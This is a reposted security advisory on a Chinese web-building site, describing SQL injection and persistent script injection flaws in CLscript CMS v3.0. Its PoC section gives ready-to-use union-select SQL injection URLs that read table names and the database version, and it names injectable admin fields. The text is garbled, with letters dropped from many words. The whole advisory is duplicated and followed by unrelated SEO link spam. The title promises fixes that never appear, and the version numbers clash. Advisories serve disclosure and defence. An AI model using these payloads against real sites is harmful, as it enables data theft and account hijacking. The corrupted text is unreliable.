CLscript CMS v3.0多重缺陷的介绍及其修复方法
网站建设 2023-02-09 11:10www.1681989.com免费网站
CLscript CMS v3.0 - Multiple Web Vulnerabilities
缺陷影响版本8.6
程序介绍:
=============
With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Classifieds and
use many new Features. The Classifieds Software is search Enge friendly to ga better Promotion
Aspects at search Enges. The whole Structure is manageable through easy to use AdmPanel.
In developg the Classified Software, we have geared ourselves to the most suessful
Classifieds-Sites on the Inter. You can generate real Ine from your Classifieds Website.
更多请查看官网
摘要
=========
CLscript v3.0 Content Management System中被发现多个缺陷
影响产品:
==================
CLscript COM
Product: CLscript Classified Software v3.0
技术分析:
========
1.1
多个注射
The vulnerability allows an attacker (remote) to ject/execute own sql mands on the affected
application dbms. The vulnerabilities are located the userDetail.php, advertise_detail.php or
land.php files with the bound vulnerable pid, rid and id parameters. Suessful exploitation of the
vulnerability results dbms, service & application promise.
Vulnerable File(s):
[+] userDetail.php
[+] advertise_detail.php
[+] land.php
Vulnerable Module(s):
[+] land
[+] pageDetail
[+] enquiry_detail
[+] userDetail
[+] advertise_detail
[+] config_id
Vulnerable Module(s):
[+] rID
[+] ID
[+] pID
[+] faq_id
[+] sp_id
[+] config_id
1.2
Multiple persistent put validation vulnerabilities are detected the CLscript v3.0 Content Management System.
The bugs allow remote attackers to implement/ject malicious script code on the application side (persistent).
The put validation vulnerabilities are located the ic, new word, subcategories, add a new help, add currency
or add new FAQs modules. Remote attackers can ject script code to the vulnerable modules by jectg malicious
tags as titles, descriptions, word names, category names, currency code or as questions. Suessful exploitation
of the vulnerability can lead to session hijackg (manager/adm) or stable (persistent) context manipulation.
Exploitation requires low user ter action & privileged user aount.
Vulnerable Module(s):
[+] Topic
[+] New word
[+] Subcategory
[+] Add a new help
[+] Add currency (Symbol - Currency code)
[+] Add new FAQ (Question)
Vulnerable Parameter(s):
[+] (title - description)
[+] (word name)
[+] (category name)
[+] (name)
[+] (symbol - currency code)
[+] (question)
测试证明:
=================
The sql jection vulnerabilities can be exploited by remote attackers without privileged user aounts or user ter action.
For demonstration or reproduce ...
PoC:
http:// /[INTERFACE]/land.php?file=edit_config&config_id=1'+order+by+1--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_config&config_id=-1'+union+select+1,
group_concat(table_name),3+from+formation_schema.tables+where+table_schema=database()--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_diycontent&pid=5'[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=add_edit_spam_words&sp_id=45'[SQL-INJECTION!]
http:// /[INTERFACE]/land.php?file=catalog&parentId=608[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/userDetail.php?id=487[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/advertise_detail.php?id=77[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_faq&faq_id=24[SQL-INJECTION!]
1.2
The persistent put validation vulnerabilities can be exploited by remote attackers with local low privileged user aounts and
with low required user ter action. For demonstration or reproduce ...
PoC:
1) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_forum
create ic (title - description is jectable)
2)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_spam_words -
add a new word (word is jectable)
3)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=catalog&parentId=608 -
add subcategory (category name is jectable)
4)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_help -
add a new help
5)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_currencie
Add currency (Symbol - Currency code is jectable)
6)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_faq
add new FAQ (Question is jectable)
风险
=====
1.1
The security risk of the sql jection vulnerabilities are estimated as critical.
1.2
The security risk of the persistent put validation vulnerabilities are estimated as medium(+).
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: .vulnerability-lab.
Mail: research@vulnerability-lab.
缺陷影响版本8.6
程序介绍:
=============
With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Classifieds and
use many new Features. The Classifieds Software is search Enge friendly to ga better Promotion
Aspects at search Enges. The whole Structure is manageable through easy to use AdmPanel.
In developg the Classified Software, we have geared ourselves to the most suessful
Classifieds-Sites on the Inter. You can generate real Ine from your Classifieds Website.
更多请查看官网
摘要
=========
CLscript v3.0 Content Management System中被发现多个缺陷
影响产品:
==================
CLscript COM
Product: CLscript Classified Software v3.0
技术分析:
========
1.1
多个注射
The vulnerability allows an attacker (remote) to ject/execute own sql mands on the affected
application dbms. The vulnerabilities are located the userDetail.php, advertise_detail.php or
land.php files with the bound vulnerable pid, rid and id parameters. Suessful exploitation of the
vulnerability results dbms, service & application promise.
Vulnerable File(s):
[+] userDetail.php
[+] advertise_detail.php
[+] land.php
Vulnerable Module(s):
[+] land
[+] pageDetail
[+] enquiry_detail
[+] userDetail
[+] advertise_detail
[+] config_id
Vulnerable Module(s):
[+] rID
[+] ID
[+] pID
[+] faq_id
[+] sp_id
[+] config_id
1.2
Multiple persistent put validation vulnerabilities are detected the CLscript v3.0 Content Management System.
The bugs allow remote attackers to implement/ject malicious script code on the application side (persistent).
The put validation vulnerabilities are located the ic, new word, subcategories, add a new help, add currency
or add new FAQs modules. Remote attackers can ject script code to the vulnerable modules by jectg malicious
tags as titles, descriptions, word names, category names, currency code or as questions. Suessful exploitation
of the vulnerability can lead to session hijackg (manager/adm) or stable (persistent) context manipulation.
Exploitation requires low user ter action & privileged user aount.
Vulnerable Module(s):
[+] Topic
[+] New word
[+] Subcategory
[+] Add a new help
[+] Add currency (Symbol - Currency code)
[+] Add new FAQ (Question)
Vulnerable Parameter(s):
[+] (title - description)
[+] (word name)
[+] (category name)
[+] (name)
[+] (symbol - currency code)
[+] (question)
测试证明:
=================
The sql jection vulnerabilities can be exploited by remote attackers without privileged user aounts or user ter action.
For demonstration or reproduce ...
PoC:
http:// /[INTERFACE]/land.php?file=edit_config&config_id=1'+order+by+1--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_config&config_id=-1'+union+select+1,
group_concat(table_name),3+from+formation_schema.tables+where+table_schema=database()--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_diycontent&pid=5'[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=add_edit_spam_words&sp_id=45'[SQL-INJECTION!]
http:// /[INTERFACE]/land.php?file=catalog&parentId=608[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/userDetail.php?id=487[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/advertise_detail.php?id=77[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_faq&faq_id=24[SQL-INJECTION!]
1.2
The persistent put validation vulnerabilities can be exploited by remote attackers with local low privileged user aounts and
with low required user ter action. For demonstration or reproduce ...
PoC:
1) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_forum
create ic (title - description is jectable)
2)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_spam_words -
add a new word (word is jectable)
3)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=catalog&parentId=608 -
add subcategory (category name is jectable)
4)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_help -
add a new help
5)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_currencie
Add currency (Symbol - Currency code is jectable)
6)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_faq
add new FAQ (Question is jectable)
风险
=====
1.1
The security risk of the sql jection vulnerabilities are estimated as critical.
1.2
The security risk of the persistent put validation vulnerabilities are estimated as medium(+).
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: .vulnerability-lab.
Mail: research@vulnerability-lab.
上一篇:一些经典的XSS跨站代码整理
下一篇:设定安全log服务器呢(RedHat)的方法
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销